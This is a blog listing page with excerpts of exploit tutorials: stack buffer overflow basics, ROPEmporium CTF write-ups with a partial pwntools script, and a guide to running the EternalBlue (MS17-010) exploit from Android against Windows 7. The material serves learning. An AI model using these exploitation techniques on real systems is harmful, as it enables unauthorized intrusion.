Postagens

[Simple 90's BOF Tricks] Stack buffer overflows advanced | chapter.1

Imagem
Hello people around the world! Sorry for the long time to do a new blog post, i had so much work , ctf's , certificates , most people never seen this blog... that's make me really sad too.. whatever .. i'll try to start this tutorial series with objective to share my little knowledge about Stack buffer overflows and related . I have plans to post most of my knowledge acquired during my OSCE , CTF's , self studing and so on . The ideia behind this tutorials series are to explain the most detailed , possible and RESUMED exploitation techniques which are normally used on real world. Those techniques are all outdated ( yes, it is!! most of them )  once all of this stack stuffs are not exploitable anymore on big applications, such as: browsers , kernel drivers , etc . Most of the modern exploits are written to explore the dynamic memory called heap . Those  heap exploits have your own classifications like stack overflows, such as: Use-After-Free , Double-Free , Heap

[ROPEmporium]: Bypassing ASLR and NX

Hi, in this tutorial i'll share how i did the write4 and split from ropemporium, bypassing NX (non executable stack) and ASLR (Address Space Layout Randomization). This script works fine to both examples. from pwn import * #context.log_level = "debug" #Enable it to use the pwntools on debug mode e = ELF( "./write432" ) #Open binary. p = process(e.path) #Create new process. p.sendline(cyclic( 400 )) #send 400 pattern to know where is the overflow. p.wait() core = p.corefile #create one core file with eip overflow. eip_offset = cyclic_find(core.eip) #find correct eip offset print "" info( "Found eip Offset %d" , eip_offset) print "" p = process(e.path) p.recv() #Searching symbols on the binary printf = e.symbols[ "printf" ] main = e.symbols[ "main" ] stdin = e.symbols[ "stdin" ] fgets = e.symbols[ "fgets" ] buffer_mem = 0x0804a028 #buffer_mem is address of .data o

[Tutorial]: MS17-010 in Android world

Imagem
MS17-010 in Android world In this tutorial, i’ll show you guys, how to use the exploit called “Eternalblue” to attack win 7 → win 10, using a android. First of all, I would recommend to you learn about what is Eternalblue , and HOW this exploit works, aaand i’m not responsible for your actions. Be careful. In this tutorial I used: Asus zc553kl with Android 7.0 (nougat). [192.168.1.7]    Windows 7 Ultimate 64bit (Virtualbox) [192.168.1.10]. Termux app ( https://termux.com/ ) Kali Linux (x86) Hacker keyboard app (Android) STARTING First of all you need to download the termux app( on playstore ) and install it. You can learn a lot on this blog how to use termux app. Link: https://gauravssnl.wordpress.com/2017/01/15/how-to-use-termux-app-for-android-terminal-emulator-and-linux-environment/ After termux updated, you must to install our friend metasploit-framework . Use this script to install it. https://github.com/verluchie/termux-metasploit

[ROPEmporium]: Callme

Callme  Hi, in this writeup i’ll try to show some techniques to use pwntools in exploitation. In this case, i’ll use the challenge called “ callme ” , from ROPEmporium:  https://ropemporium.com/challenge/callme.html Hope you enjoy ;) At beginning, lets try to understand how the program flow works. root@kali:~/ Desktop/ropemporium/me/callme # . /callme32 callme by ROP Emporium 32bits Hope you read the instructions... > blabla Exiting So, lets read the instructions.. Text from the ROPEmporium website: Correct order Important: To dispose of the need for any RE we'll tell you the following: You must call  callme_one() , callme_two()  and  callme_three()  in that order, each with the arguments 1,2,3 e.g.  callme_one(1,2,3)  to print the flag.... Ok! we got an idea behind the program.. we need to execute functions which are not in the callme32 binary, but are on the libcallme32.so file. These functions are called by usefulFunction,